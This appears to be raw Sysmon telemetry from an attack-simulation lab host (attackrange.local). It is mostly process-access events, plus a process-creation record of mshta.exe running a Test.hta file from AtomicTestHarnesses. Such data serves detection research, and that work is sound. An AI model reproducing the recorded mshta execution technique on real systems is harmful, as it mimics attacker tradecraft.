16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030568Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030567Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030566Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030565Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030564Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030563Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030562Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030561Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030560Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030559Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030558Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030557Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030556Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030555Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030554Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030553Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030552Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030551Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030550Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030549Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030576Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:36.474{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030668Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.879{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030667Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.879{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030666Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.879{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030665Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.879{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030664Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.879{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030663Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.879{7901BC46-55CB-6008-F206-00000000A301}2880828C:\Windows\explorer.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000030662Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.885{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=A65AE0DB1DAA6B07C89DCC1E21D3EB42,SHA256=5B6429B98ADF532E6F694C9A6CD1A1943B4AA3D5EA524D4FB353939FD9C61342,IMPHASH=79925B1930721457F5E11BF877806843{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding 10341000x800000000000000030661Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.879{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030660Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.879{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.d